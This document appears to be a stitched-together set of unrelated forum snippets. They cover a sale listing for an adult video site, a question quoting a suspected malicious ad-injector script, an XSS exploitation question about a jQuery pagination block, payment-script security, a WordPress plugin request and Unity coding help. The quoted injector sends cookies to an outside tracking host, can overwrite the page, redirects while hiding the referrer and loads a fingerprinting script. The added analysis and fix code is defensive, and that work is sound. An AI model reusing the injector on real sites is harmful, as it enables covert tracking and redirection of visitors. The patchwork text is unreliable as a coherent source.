[NSFW] DreamyTransexuals.com + WP script license and plugin

Why are you selling this site?
Need the money

How is it monetized?
Using http://exoclick.com/

Does this site come with any social media accounts?
Yeah, a Twitter account with over 2k followers and loads of tweets

How much time does this site take to run?
Very little

What challenges are there with running this site?
Increasing traffic, removing videos that were removed from pornhub.com, ...

FB ads with script injectors [closed]

This is my first post, so I am really sorry for my English and possibly illogical sentences; if something is not clear, write it and I will explain. 🙂

A few months ago I started noticing strange, different ads on Facebook (all of them were saying you can get rich and have a Ferrari by doing this "xx" in one week, as a person [in every ad that person was added as if he had done it, he knows the way to get rich and is sharing his own advice, and you need to click on it in the ad's photo]). At first look those ads looked legitimate; then I checked the links of the site and they did not match, plus the title of the ad was untrue [that person in the photo did not have a Ferrari or 1 MK Eur], so I suspected scammers or else..

I reported all of them, but they kept creating more of them to make people click on them, so one day by mistake I clicked on that site on a fresh OS {without sandbox} and I got scared of being exploited just by clicking an ad lol, so I started to look into that website and I found that they are injecting a script {that script-injector part will probably be malicious and it works over XHR it seems; there are a few scripts I will post below. I would like to hear what you think about them because I don't have much knowledge about this and I want to understand how it works and what it does...}

Can you help me understand what the purposes of these scripts are, and what they are for? (scripts below)

One of many js scripts:

    (function() {
        // Skip tracking when the URL carries ?_novisit=on / &_novisit=on
        if (window.location.href.search("[?&]_novisit=on") != -1) return;
        var xhr = new XMLHttpRequest();
        xhr.withCredentials = true; // send cookies to the tracking host
        xhr.open("GET", "http://tracksystem1.com/_remote_track?campaign=" + escape("eQ7oRjqn4h") +
            "&referrer=" + escape(document.referrer) +
            "&uri=" + escape(window.location.href), true);
        xhr.onload = function() {
            if (xhr.status !== 200) return;
            // Without the Struct-Response header, the whole page is replaced by the response body
            if (xhr.getResponseHeader("Struct-Response") !== "true") {
                document.open();
                document.write(xhr.responseText);
                document.close();
                return;
            }
            var resp = JSON.parse(xhr.responseText);
            if (resp.result === "redirect") {
                // Rewrite the document into a meta refresh, suppressing the Referer header
                document.open();
                document.write('<html><head>');
                document.write('<meta name="referrer" content="never" />');
                document.write('<meta http-equiv="refresh" content="0; url=' + resp.redirect_url + '" />');
                document.write('</head></html>');
                document.close();
                return;
            }
            if (resp.result === "fp") {
                // Load a second script (fingerprinting) from the server-supplied URL, then run fp.init
                var cb = function() {
                    fp.init(resp.fp.data_url, "", resp.fp.checks, true);
                };
                var ref = document.getElementsByTagName("script")[0];
                var script = document.createElement("script");
                script.type = "text/javascript";
                if (script.readyState) { // IE
                    script.onreadystatechange = function() {
                        if (script.readyState == "loaded" || script.readyState == "complete") {
                            script.onreadystatechange = null;
                            cb();
                        }
                    };
                } else {
                    script.onload = cb;
                }
                script.src = resp.fp.script_url;
                ref.parentNode.insertBefore(script, ref);
                return;
            }
        };
        xhr.send();
    })();

I add the other scripts as links, sorry for that, they were too..

Link 1.

https://cdn.shopify.com/s/javascripts/tricorder/trekkie.storefront.min.js?v=2019.11.04.1 

Link 2.

https://cdn.shopify.com/s/files/1/0306/6288/5514/t/1/assets/lazysizes.js?v=9422402313628365795 

Link 3.

https://cdn.shopify.com/s/files/1/0306/6288/5514/t/1/assets/vendor.js?v=1200183919454698418 

Link 4. (sorry long long code…)

https://cdn.shopify.com/s/files/1/0306/6288/5514/t/1/assets/theme.js?v=7761725207979859454 

Link 5.

https://cdn.shopify.com/s/assets/shop_events_listener-09875a9a2b286acf534498184c24b199675a6097a941992d0979e5295d2cf9e9.js 

Link 6.

https://cdn.shopify.com/s/assets/storefront/load_feature-98ef862814fe2952ed0893b184775afe7f06464f1ff22ee18736b6431a6c6317.js 

Link 7.

https://cdn.shopify.com/s/assets/storefront/features-4213bd6d119d33741849bb3a48d551b05323182f2fc715e4461c20b760628ed2.js

Link 8.

https://cdn.shopify.com/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js

Link 9. 

https://cdn.shopify.com/shopifycloud/payment-sheet/assets/latest/spb.en.js

Link 10.

https://cdn.shopify.com/shopifycloud/payment-sheet/assets/latest/f9ca74cf37059edba4aa.0.en.js

Link 11.

https://cdn.shopify.com/shopifycloud/payment-sheet/assets/latest/bbeb2da948901f4282fa.5.en.js
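As an added example (not part of the question or of the scripts it quotes), the function below models the three branches of the first script above, so a reply captured from the tracking endpoint in a proxy log can be classified offline; the header and JSON field names are the ones the posted script reads, and the sample replies and URLs are constructed.

```javascript
// Added example, not code from the question: classify a captured reply from
// the _remote_track endpoint by the branch the posted script would take.
// Header and field names match the posted script; sample data is constructed.
function interpretTrackerResponse(status, headers, body) {
  if (status !== 200) {
    return { action: "none", reason: "non-200 status, onload returns early" };
  }
  const structured = (headers["Struct-Response"] || headers["struct-response"]) === "true";
  if (!structured) {
    // document.open()/write()/close(): the current page is replaced by the body
    return { action: "replace-document", htmlLength: body.length };
  }
  let resp;
  try {
    resp = JSON.parse(body);
  } catch (e) {
    return { action: "none", reason: "JSON.parse throws, nothing happens" };
  }
  if (resp.result === "redirect") {
    // meta refresh plus <meta name="referrer" content="never">: the landing
    // page does not learn which site or ad sent the visitor
    return { action: "redirect", url: resp.redirect_url, referrerSuppressed: true };
  }
  if (resp.result === "fp") {
    // a server-chosen second script is injected and fp.init() is run
    return {
      action: "load-fingerprint-script",
      scriptUrl: resp.fp.script_url,
      dataUrl: resp.fp.data_url,
      checks: resp.fp.checks,
    };
  }
  return { action: "none", reason: "unknown result: " + resp.result };
}

// Constructed sample replies, shaped like entries from a proxy log
const SAMPLE_REPLIES = [
  { status: 200, headers: {}, body: "<html><body>Offer page</body></html>" },
  { status: 200, headers: { "Struct-Response": "true" },
    body: JSON.stringify({ result: "redirect", redirect_url: "https://landing.example/offer" }) },
  { status: 200, headers: { "Struct-Response": "true" },
    body: JSON.stringify({ result: "fp", fp: { script_url: "https://cdn.example/fp.js",
      data_url: "https://fp.example/collect", checks: ["canvas", "fonts"] } }) },
];

function triageSamples() {
  return SAMPLE_REPLIES.map((r) => interpretTrackerResponse(r.status, r.headers, r.body));
}
```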


Is there a vulnerability other than XSS which can result in client side script execution?

If the intention of the attacker is to execute an arbitrary client-side script in the context of a web application, is XSS the only possible attack other than compromising the server with an RCE or a sub-resource supply-chain attack? I am looking for attacks which can be mitigated by the application owner rather than attacks which the application cannot control.

  • XSS is Cross-Site Scripting, be it reflected, persistent or DOM-based.
  • A sub-resource supply-chain attack is where you compromise a sub-resource such as CSS, JavaScript, Flash objects etc. by compromising the supply chain, i.e. compromising the CDNs, S3 buckets etc., or by MITM-ing a sub-resource loaded over a non-HTTPS channel.

ReplaceRepeated with special characters: Double-struck and Script

Following the advice here, I tried to replace part of an expression guided by the FullForm details:

    -B + b - ((-A + a) \[DoubleStruckCapitalE][(-A + a) (-B + b) | \[ScriptCapitalF]])/
      \[DoubleStruckCapitalE][(-A + a)^2 | \[ScriptCapitalF]] & // FullForm

    Function[Plus[Times[-1, B], b,
      Times[-1, Times[Plus[Times[-1, A], a],
        \[DoubleStruckCapitalE][Alternatives[Times[Plus[Times[-1, A], a], Plus[Times[-1, B], b]], \[ScriptCapitalF]]],
        Power[\[DoubleStruckCapitalE][Alternatives[Power[Plus[Times[-1, A], a], 2], \[ScriptCapitalF]]], -1]]]]]

However, the replacement rule still does not take effect:

    {-B + b - ((-A + a) \[DoubleStruckCapitalE][(-A + a) (-B + b) | \[ScriptCapitalF]])/
       \[DoubleStruckCapitalE][(-A + a)^2 | \[ScriptCapitalF]] &} //.
     {\[DoubleStruckCapitalE][Alternatives[Power[Plus[Times[-1, a_], b_], 2], \[ScriptCapitalF]]] ->
       Power[Plus[Times[-1, a], b], 2]}

I'm obviously struggling with how to do things in MMA. I'd appreciate any hints or tips.

JQuery function inside Script Tag. How to execute XSS in such a scenario?

The value of currentPage: can be controlled by the user. All characters (like " ' ( ) / ; :), except < & >, are injected without being sanitized.

Is there any possible way to execute XSS in such a scenario?

    <script type="text/javascript">
    $(function() {
        $("#blog-pagi").pagination({
            items: 9,
            itemsOnPage: 6,
            currentPage: inject payload here
            edges: 0,
            displayedPages: 10,
            hrefTextPrefix: "?page=",
            prevText: "<i class=\"fa fa-chevron-left\" ></i>",
            nextText: "<i class=\"fa fa-chevron-right\" ></i>",
            onPageClick: function(pageNumber, event) {
                window.history.replaceState(null, null, "?page=" + pageNumber);
            },
        });
    });
    </script>
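From the application owner's side, the fix for a sink like this is to never let a raw user string reach the script context. The following is added example code (not from the question): it renders the same pagination block with the page number validated as an integer, and shows the JSON-plus-\u-escape encoding to use if a string ever has to be embedded; the function names are made up for this example.

```javascript
// Added example, not code from the question: safe ways to put a
// user-controlled currentPage value into the pagination <script> block.
// Function names are assumed; the option names are those of the posted snippet.

// Preferred: the value is a page number, so only an integer ever reaches the
// script. Anything else (letters, quotes, parentheses, "0") falls back to page 1.
function parsePageNumber(raw, fallback = 1) {
  const s = String(raw == null ? "" : raw).trim();
  if (!/^[1-9][0-9]{0,5}$/.test(s)) return fallback;
  return Number(s);
}

// If a string must be embedded as a JS literal: JSON-encode it, then \u-escape
// the characters the HTML parser cares about inside <script> (and the two line
// terminators that are legal in JSON but not in older JS string literals).
function toScriptLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Renders the initialiser with a validated page number (prev/next markup omitted).
function renderPaginationScript(rawCurrentPage) {
  const currentPage = parsePageNumber(rawCurrentPage);
  return [
    '<script type="text/javascript">',
    "$(function() {",
    '    $("#blog-pagi").pagination({',
    "        items: 9,",
    "        itemsOnPage: 6,",
    "        currentPage: " + currentPage + ",",
    "        edges: 0,",
    "        displayedPages: 10,",
    '        hrefTextPrefix: "?page=",',
    "        onPageClick: function(pageNumber, event) {",
    '            window.history.replaceState(null, null, "?page=" + pageNumber);',
    "        },",
    "    });",
    "});",
    "</script>",
  ].join("\n");
}
```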

In page Payment script security needs

Currently I'm working at a fintech startup. We have already implemented our payment solution with a redirect to a checkout page hosted on our domain (like https://stripe.com/docs/payments/checkout).

Now we are going to implement a solution that allows payments directly on the merchant's page, but in order to remain PCI compliant on the merchant's page as well, we need to provide a script that the merchant can insert into their website, where the sensitive data is collected and forwarded to our APIs (like https://stripe.com/docs/payments/accept-a-payment).

I have to write a JavaScript script that enables "in page" merchant payments, but I can't find a list of the security needs anywhere.

Checking several PSPs that provide the same functionality, I found some of the security needs:

  1. The script and the form that collect sensitive data must be hosted on the PSP domain and inserted into the merchant webpage with an iframe.
  2. The ids of the inputs on the form that collect credit card data must be randomly generated.
  3. The merchant's website must load the script directly from our domain in order to remain PCI compliant (is there any way to check this point?).
  4. The JavaScript file must be minified and uglified.

My questions: is there any document that explains all the recommended security needs for this type of script? Otherwise, is my security list enough? Are there any errors in my list?
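To make points 1 to 3 concrete, here is an added example of the PSP-side script skeleton (it is not Stripe's code nor any real PSP's SDK): the script checks its own source origin, mounts the card form as an iframe on the PSP origin with random field ids, and only accepts a token message whose origin is the PSP. The origin https://pay.psp.example, the frame path and the token message shape are assumptions made for this example.

```javascript
// Added example, not any PSP's real SDK: PSP origin, frame path and the
// {token} message format are assumptions for this illustration.
const PSP_ORIGIN = "https://pay.psp.example";
const FRAME_PATH = "/v1/card-form";

// Point 3: the script checks where it was served from; a copy re-hosted on
// the merchant's domain or a CDN fails this check.
function isServedFromPsp(scriptSrc, pspOrigin = PSP_ORIGIN) {
  try {
    return new URL(scriptSrc).origin === pspOrigin;
  } catch (e) {
    return false; // inline script or unparsable src
  }
}

// Point 2: fresh random ids per mount, so card inputs have no fixed selector.
function randomFieldId(prefix) {
  const bytes = new Uint8Array(8);
  (globalThis.crypto || require("crypto").webcrypto).getRandomValues(bytes);
  return prefix + "-" + Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
}

// Point 1: card data is only typed into a document served from the PSP origin.
function buildFrameUrl(merchantPublicKey, fieldIds, pspOrigin = PSP_ORIGIN) {
  const u = new URL(FRAME_PATH, pspOrigin);
  u.searchParams.set("pk", merchantPublicKey);
  u.searchParams.set("ids", fieldIds.join(","));
  return u.toString();
}

// The merchant page receives only a token, and only from the PSP frame.
function isTrustedFrameMessage(event, pspOrigin = PSP_ORIGIN) {
  return Boolean(event.origin === pspOrigin && event.data && typeof event.data.token === "string");
}

// Browser-only glue (returns null outside a DOM so the module loads in Node).
function mountCardForm(container, merchantPublicKey, onToken) {
  if (typeof document === "undefined") return null;
  const me = document.currentScript && document.currentScript.src;
  if (!isServedFromPsp(me)) throw new Error("psp script must be loaded from " + PSP_ORIGIN);
  const ids = [randomFieldId("pan"), randomFieldId("exp"), randomFieldId("cvc")];
  const frame = document.createElement("iframe");
  frame.src = buildFrameUrl(merchantPublicKey, ids);
  frame.setAttribute("sandbox", "allow-scripts allow-forms allow-same-origin");
  window.addEventListener("message", (ev) => { if (isTrustedFrameMessage(ev)) onToken(ev.data.token); });
  container.appendChild(frame);
  return frame;
}
```

The self-origin check only tells the PSP that its script was fetched from its own host; whether the merchant page has been tampered with by other scripts is outside what point 3 can verify from inside the page.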

eSports Gaming Plugins / Script

My question is regarding gaming / eSports. There are some gaming websites where, if you register and put in your PSN / Xbox / Steam ID, it syncs with your gaming account and shows all your gaming details. My question is: is this feature available in WordPress? If yes, then please share the plugins, and if not, then which script allows this kind of feature?

How to manage game-object script component and values in new updated model in unity

I have a large object that contains many GameObjects (the FBX), with several MonoBehaviour scripts attached with different values assigned publicly in the inspector. The problem is that each time we update the model in the project (the FBX in the project) we have to drag and drop the model/FBX again. That means we have to attach all the scripts again with the relevant values/data. I am currently looking for the right way to do this job. Currently I place both the new and the old FBX in the scene and then one by one I copy-paste the old object's script components into the new object. Then I delete the old object/model/FBX.

Note: I have to bring the FBX into the hierarchy again because sometimes the object is not properly updated in the scene.

How to use GameManager to get GameOver() from another script?

I'm trying to make a game-over text show when the player leaves the plane area. In GameManager.cs I've written:

    public void GameOver()
    {
        gameOverText.gameObject.SetActive(true);
    }

And in PlayerController.cs I've used the following code:

    private GameManager gameManager; 

and:

    void Update()
    {
        float horizontalInput = Input.GetAxis("Horizontal");
        float verticalInput = Input.GetAxis("Vertical");

        playerRb.AddForce(Vector3.right * speed * horizontalInput);
        playerRb.AddForce(Vector3.forward * speed * verticalInput);

        if (transform.position.y < -4)
        {
            gameManager.GameOver();
        }
    }

But this doesn't really work, and the console is giving me this message:

Assets/Scripts/PlayerController.cs(8,25): warning CS0649: Field ‘PlayerController.gameManager’ is never assigned to, and will always have its default value null

I've already used OnTriggerEnter (for powerups) and OnCollisionEnter (for enemies). How can I get the game-over text to show when the player leaves the "Plane"?